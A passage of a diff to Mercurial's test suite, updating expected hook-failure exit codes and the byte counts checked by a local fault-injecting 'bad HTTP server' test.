rollback completed abort: pretxnchangegroup.forbid1 hook exited with status 1 - [255] + [40] $ hg -q tip 3:07f3376c1e65 @@ -786,7 +786,7 @@ HG_SOURCE=pull abort: preoutgoing.forbid hook exited with status 1 - [255] + [40] outgoing hooks work for local clones @@ -825,7 +825,7 @@ HG_SOURCE=clone abort: preoutgoing.forbid hook exited with status 1 - [255] + [40] $ cd "$TESTTMP/b" @@ -915,7 +915,7 @@ hooktype preoutgoing source pull abort: preoutgoing.fail hook failed - [255] + [40] $ echo '[hooks]' > ../a/.hg/hgrc $ echo 'preoutgoing.uncallable = python:hooktests.uncallable' >> ../a/.hg/hgrc @@ -1283,7 +1283,7 @@ rollback completed strip failed, backup bundle stored in * (glob) abort: pretxnclose.error hook exited with status 1 - [255] + [40] $ hg recover no interrupted transaction available [1] @@ -1306,7 +1306,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ cp .hg/store/00changelog.i.a.saved .hg/store/00changelog.i.a (check (in)visibility of new changeset while transaction running in @@ -1331,7 +1331,7 @@ transaction abort! 
rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] Hook from untrusted hgrc are reported as failure ================================================ @@ -1382,7 +1382,7 @@ rollback completed abort: untrusted hook pretxnclose.testing not executed (see 'hg help config.trusted') - [255] + [40] $ hg log changeset: 0:3903775176ed tag: tip @@ -1407,12 +1407,12 @@ $ cat << EOF >> .hg/hgrc > [hooks] - > pre-version.testing-default=echo '### default ###' plain: \${HGPLAIN:-'<unset>'} - > pre-version.testing-yes=echo '### yes #######' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-default=sh -c "echo '### default ###' plain: \${HGPLAIN:-'<unset>'}" + > pre-version.testing-yes=sh -c "echo '### yes #######' plain: \${HGPLAIN:-'<unset>'}" > pre-version.testing-yes:run-with-plain=yes - > pre-version.testing-no=echo '### no ########' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-no=sh -c "echo '### no ########' plain: \${HGPLAIN:-'<unset>'}" > pre-version.testing-no:run-with-plain=no - > pre-version.testing-auto=echo '### auto ######' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-auto=sh -c "echo '### auto ######' plain: \${HGPLAIN:-'<unset>'}" > pre-version.testing-auto:run-with-plain=auto > EOF diff --git a/tests/test-http-bad-server.t b/tests/test-http-bad-server.t --- a/tests/test-http-bad-server.t +++ b/tests/test-http-bad-server.t @@ -13,6 +13,7 @@ > fakeversion = `pwd`/fakeversion.py > [format] > sparse-revlog = no + > use-persistent-nodemap = no > [devel] > legacy.exchange = phases > [server] @@ -118,17 +119,17 @@ readline(115 from *) -> (*) host: localhost:$HGPORT\r\n (glob) readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(* from *) -> (2) \r\n (glob) - sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) 
- sendall(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23) -> Server: badhttpserver\r\n (no-py3 !) write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !) write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21) -> Content-Length: 450\r\n (no-py3 !) + write(21) -> Content-Length: 431\r\n (no-py3 !) write(2) -> \r\n (no-py3 !) 
- write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(4? from 65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n (glob) readline(1? from *) -> (1?) Accept-Encoding* (glob) read limit reached; closing socket @@ -163,17 +164,17 @@ readline(213 from *) -> (*) host: localhost:$HGPORT\r\n (glob) readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(* from *) -> (2) \r\n (glob) - sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) 
+ sendall(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23) -> Server: badhttpserver\r\n (no-py3 !) write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !) write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21) -> Content-Length: 450\r\n (no-py3 !) + write(21) -> Content-Length: 431\r\n (no-py3 !) write(2) -> \r\n (no-py3 !) - write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(13? from 65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n (glob) readline(1?? from *) -> (27) Accept-Encoding: identity\r\n (glob) readline(8? from *) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -228,17 +229,17 @@ readline(234 from *) -> (2?) 
host: localhost:$HGPORT\r\n (glob) readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(* from *) -> (2) \r\n (glob) - sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 463\r\n\r\n (py36 !) - sendall(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 463\r\n\r\n (py3 no-py36 !) - write(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 444\r\n\r\n (py36 !) + sendall(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 444\r\n\r\n (py3 no-py36 !) 
+ write(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23) -> Server: badhttpserver\r\n (no-py3 !) write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !) write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21) -> Content-Length: 463\r\n (no-py3 !) + write(21) -> Content-Length: 444\r\n (no-py3 !) write(2) -> \r\n (no-py3 !) - write(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + write(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(1?? from 65537) -> (27) POST /?cmd=batch HTTP/1.1\r\n (glob) readline(1?? from *) -> (27) Accept-Encoding: identity\r\n (glob) readline(1?? from *) -> (41) content-type: application/mercurial-0.1\r\n (glob) @@ -296,7 +297,7 @@ Traceback (most recent call last): Exception: connection closed after sending N bytes - write(286) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\nHTTP/1.1 500 Internal Server Error\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nTransfer-Encoding: chunked\r\n\r\n (py3 no-py36 !) 
+ write(286) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\nHTTP/1.1 500 Internal Server Error\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nTransfer-Encoding: chunked\r\n\r\n (py3 no-py36 !) write(36) -> HTTP/1.1 500 Internal Server Error\r\n (no-py3 !) $ rm -f error.log @@ -307,7 +308,7 @@ $ cat hg.pid > $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ clone - abort: HTTP request error (incomplete response; expected 450 bytes got 20) + abort: HTTP request error (incomplete response; expected 431 bytes got 20) (this may be an intermittent network failure; if the error persists, consider contacting the network or server operator) [255] @@ -320,17 +321,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(20 from 450) -> (0) batch branchmap bund (py36 !) - write(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(20 from 450) -> (0) batch branchmap bund (py3 no-py36 !) + sendall(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(20 from 431) -> (0) batch branchmap bund (py36 !) + write(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(20 from 431) -> (0) batch branchmap bund (py3 no-py36 !) 
write(36 from 36) -> (144) HTTP/1.1 200 Script output follows\r\n (no-py3 !) write(23 from 23) -> (121) Server: badhttpserver\r\n (no-py3 !) write(37 from 37) -> (84) Date: $HTTP_DATE$\r\n (no-py3 !) write(41 from 41) -> (43) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (22) Content-Length: 450\r\n (no-py3 !) + write(21 from 21) -> (22) Content-Length: 431\r\n (no-py3 !) write(2 from 2) -> (20) \r\n (no-py3 !) - write(20 from 450) -> (0) batch branchmap bund (no-py3 !) + write(20 from 431) -> (0) batch branchmap bund (no-py3 !) write limit reached; closing socket $LOCALIP - - [$ERRDATE$] Exception happened during processing request '/?cmd=capabilities': (glob) Traceback (most recent call last): @@ -341,7 +342,7 @@ Server sends incomplete headers for batch request - $ hg serve --config badserver.closeaftersendbytes=728 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=709 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS TODO this output is horrible @@ -363,17 +364,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) 
- write(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (692) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (669) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (632) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (591) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (570) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (568) \r\n (no-py3 !) - write(450 from 450) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (549) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (568) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) 
+ write(36 from 36) -> (673) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (650) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (613) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (572) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (551) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (549) \r\n (no-py3 !) + write(431 from 431) -> (118) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -401,7 +402,7 @@ Server sends an incomplete HTTP response body to batch request - $ hg serve --config badserver.closeaftersendbytes=793 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=774 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS TODO client spews a stack due to uncaught ValueError in batch.results() @@ -422,17 +423,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) - sendall(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) 
- write(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (757) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (734) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (697) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (656) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (635) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (633) \r\n (no-py3 !) - write(450 from 450) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (614) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) + write(160 from 160) -> (633) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) 
+ write(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (738) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (715) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (678) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (637) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (616) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (614) \r\n (no-py3 !) + write(431 from 431) -> (183) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) readline(65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n readline(*) -> (27) Accept-Encoding: identity\r\n (glob) readline(*) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob) @@ -463,7 +464,7 @@ Server sends incomplete headers for getbundle response - $ hg serve --config badserver.closeaftersendbytes=940 -p $HGPORT -d --pid-file=hg.pid -E error.log + $ hg serve --config badserver.closeaftersendbytes=921 -p $HGPORT -d --pid-file=hg.pid -E error.log $ cat hg.pid > $DAEMON_PIDS TODO this output is terrible @@ -486,17 +487,17 @@ readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob) readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob) readline(*) -> (2) \r\n (glob) - sendall(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !) 
- sendall(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) - write(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !) - write(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) - write(36 from 36) -> (904) HTTP/1.1 200 Script output follows\r\n (no-py3 !) - write(23 from 23) -> (881) Server: badhttpserver\r\n (no-py3 !) - write(37 from 37) -> (844) Date: $HTTP_DATE$\r\n (no-py3 !) - write(41 from 41) -> (803) Content-Type: application/mercurial-0.1\r\n (no-py3 !) - write(21 from 21) -> (782) Content-Length: 450\r\n (no-py3 !) - write(2 from 2) -> (780) \r\n (no-py3 !) - write(450 from 450) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) + sendall(160 from 160) -> (761) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !) + sendall(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !) 
+ write(160 from 160) -> (780) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !) + write(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !) + write(36 from 36) -> (885) HTTP/1.1 200 Script output follows\r\n (no-py3 !) + write(23 from 23) -> (862) Server: badhttpserver\r\n (no-py3 !) + write(37 from 37) -> (825) Date: $HTTP_DATE$\r\n (no-py3 !) + write(41 from 41) -> (784) Content-Type: application/mercurial-0.1\r\n (no-py3 !) + write(21 from 21) -> (763) Content-Length: 431\r\n (no-py3 !) + write(2 from 2) -> (761) \r\n (no-py3 !) + write(431 from 431) -> (330) batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !) 
